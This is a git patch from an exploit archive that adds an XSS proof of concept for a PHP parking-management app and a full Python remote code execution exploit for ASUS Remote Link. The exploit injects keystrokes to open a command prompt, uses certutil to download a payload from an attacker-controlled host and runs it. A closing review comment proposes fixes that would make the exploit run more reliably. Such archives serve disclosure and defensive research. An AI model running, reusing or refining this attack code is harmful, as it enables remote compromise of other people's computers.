From 0ec0dacc0ec8dcd2ce526d7c9a8affd3c2063124 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 26 Feb 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-02-26

3 changes to exploits/shellcodes
ASUS Remote Link 1.1.2.13 - Remote Code Execution
Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
---
 exploits/php/webapps/49595.txt | 38 ++++++++
 exploits/ruby/webapps/49334.py | 3 +-
 exploits/windows/remote/49594.py | 162 +++++++++++++++++++++++++++++++
 files_exploits.csv | 2 +
 4 files changed, 204 insertions(+), 1 deletion(-)
 create mode 100644 exploits/php/webapps/49595.txt
 create mode 100755 exploits/windows/remote/49594.py
diff --git a/exploits/php/webapps/49595.txt b/exploits/php/webapps/49595.txt
new file mode 100644
index 000000000..c9721eb31
--- /dev/null
+++ b/exploits/php/webapps/49595.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-02-25
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
+# Version: v1.0
+# Tested on: Ubuntu
+
+
+*Steps to Reproduce:*
+1) Login with Admin Credentials and click on the '*Manage category*' button.
+2) Click on the '*Add Categories*' button.
+3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
+4) Now add the following payload input field of *Category *as a parameter name is *catename*
+
+Payload: ba1man">
+
+4) Click On Save
+5) Now go to '*Manage category > View Categories*'
+5) XSS payload is triggered.
+
+*proof-of-concept:*
+1) Request:
+
+POST /lagos_parker/parker/addcategory.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/lagos_parker/parker/addcategory.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 82
+Connection: close
+Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
+Upgrade-Insecure-Requests: 1
+catename=ba1man">&submit=
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49334.py b/exploits/ruby/webapps/49334.py
index f0e29ed1b..31345e155 100755
--- a/exploits/ruby/webapps/49334.py
+++ b/exploits/ruby/webapps/49334.py
@@ -1,7 +1,8 @@
 # Exploit Title: GitLab 11.4.7 RCE (POC)
 # Date: 24th December 2020
 # Exploit Author: Norbert Hofmann
-# Original Exploit Authors: Sam Redmond, Tam Lai Yin
+# Exploit Modifications: Sam Redmond, Tam Lai Yin
+# Original Author: Mohin Paramasivam
 # Software Link: https://gitlab.com/
 # Environment: GitLab 11.4.7, community edition
 # CVE: CVE-2018-19571 + CVE-2018-19585
diff --git a/exploits/windows/remote/49594.py b/exploits/windows/remote/49594.py
new file mode 100755
index 000000000..9f3ee4999
--- /dev/null
+++ b/exploits/windows/remote/49594.py
@@ -0,0 +1,162 @@ +# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution +# Date: 24-02-2021 +# Exploit Author: H4rk3nz0 +# Vendor Homepage: http://asus.com/ +# Software Link: http://remotelink.asus.com/ +# Version: 1.1.2.13 +# Tested on: Windows 10 Enterprise Build 17763 +# CVE: N/A + +#!/usr/bin/python + +import socket +from time import sleep +import sys + + +port = 5665 +target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +prefix = "04020b02" +suffix = "0000020000000000000000000300000000000000000004000000000000000000010000" +enter = (prefix + ("0" * 1038)).decode("hex") +string_prefix = "04020b0200000000010000" +string_suffix = "0" * 1022 +pre_command = "04000b0200000000".decode("hex") +user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender' + +# ASCII to Hex Character List +characters={ + "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", + "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", + "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", + "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", + "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", + " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", + ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", + "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", + "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} + + +# User Specified arguments +try: + rhost = "192.168.1.93" + lhost = sys.argv[2] + payload = sys.argv[3] +except: + print("Usage: python " + sys.argv[0] + " ") + exit() + +# HandShake Packets to Smart 
Gesture Server +def Handshake(): + target.connect((rhost,port)) + target.sendto("b2".decode("hex"),(rhost,port)) + target.sendto("38323538".decode("hex"),(rhost,port)) + target.sendto("03000f0000000000".decode("hex"),(rhost,port)) + target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port)) + target.sendto("02008a0000000000".decode("hex"),(rhost,port)) + target.sendto(user_declare,(rhost,port)) + sleep(0.1) + + +def MoveMouse(): + for i in range(0,16): + target.sendto("0000330038040006".decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port)) + 
target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port)) + sleep(0.6) + +# Sends Left Click Input (Occasional Delay for some Reason) +def LeftClick(): + target.sendto("0000330038040006".decode("hex"),(rhost,port)) + 
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port)) + sleep(4) + +# Send Enter/Return Key Input +def SendReturn(): + target.sendto(pre_command,(rhost,port)) + sleep(0.2) + target.sendto(enter,(rhost,port)) # Enter/Return Key + +# Send String Characters +def SendString(string): + for char in string: + convert = characters[char] + final_string = string_prefix + convert + string_suffix + target.sendto(pre_command,(rhost,port)) + target.sendto(final_string.decode("hex"),(rhost,port)) + sleep(0.2) + +# Main Execution +def main(): + print("[+] Saying Hello") + Handshake() + sleep(2) + print("[+] Moving Mouse") + MoveMouse() + print("[+] Left Clicking (takes a few seconds)") + LeftClick() # Left Click is delayed sometimes + print("[+] Opening CMD") + SendString("cmd.exe") # Start Command Prompt + sleep(0.5) + SendReturn() + sleep(1) + print("[+] Retrieving Payload") + SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload + sleep(0.5) + SendReturn() + sleep(3) + print("[+] Executing") + SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload + sleep(0.5) + SendReturn() + sleep(0.5) + print("[+] Done! 
Check your listener?")
+ SendReturn() # Trailing Enter Command Ensures full execution
+ target.close()
+ exit()
+
+if __name__=="__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4564adff9..decfe5cee 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18388,6 +18388,7 @@ id,file,description,date,author,type,platform,port
 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
 49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
 49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple,
+49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43782,3 +43783,4 @@ id,file,description,date,author,type,platform,port
 49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,
 49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
 49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php,
+49595,exploits/php/webapps/49595.txt,"Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)",2021-02-25,"Tushar Vaidya",webapps,php,
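Review bot: The argument block under "User Specified arguments" in 49594.py never reads `sys.argv[1]`: `rhost` is pinned to `"192.168.1.93"` while `lhost` and `payload` come from `sys.argv[2]` and `sys.argv[3]`, so the first positional argument is silently ignored and the usage message (whose placeholder names appear to have been lost, leaving `" "`) does not describe what the script does; if a target argument was intended, `rhost = sys.argv[1]` with the narrower `except IndexError:` in place of the bare `except:` (which also swallows `KeyboardInterrupt`) fixes both. The `#!/usr/bin/python` line sits after the header comments rather than on line 1, so it has no effect, and every `.decode("hex")` call is Python 2-only (`str` has no `decode` on Python 3) — that constraint belongs in the header, e.g. `# Requires: Python 2.7 (uses str.decode("hex"))`. In `main`, `"C:\\Windows\Temp\\"` contains the invalid escape `\T` (inconsistent with `"C:\\Windows\\Temp\\"` two calls later); it still evaluates to the intended backslash but warns on recent interpreters. `SendString` indexes the `characters` table directly, so any character of `payload` outside the table raises `KeyError` mid-sequence after the connection is already open rather than failing up front; a `"%02x" % ord(char)` conversion or an early validation of `payload` against the table would avoid that.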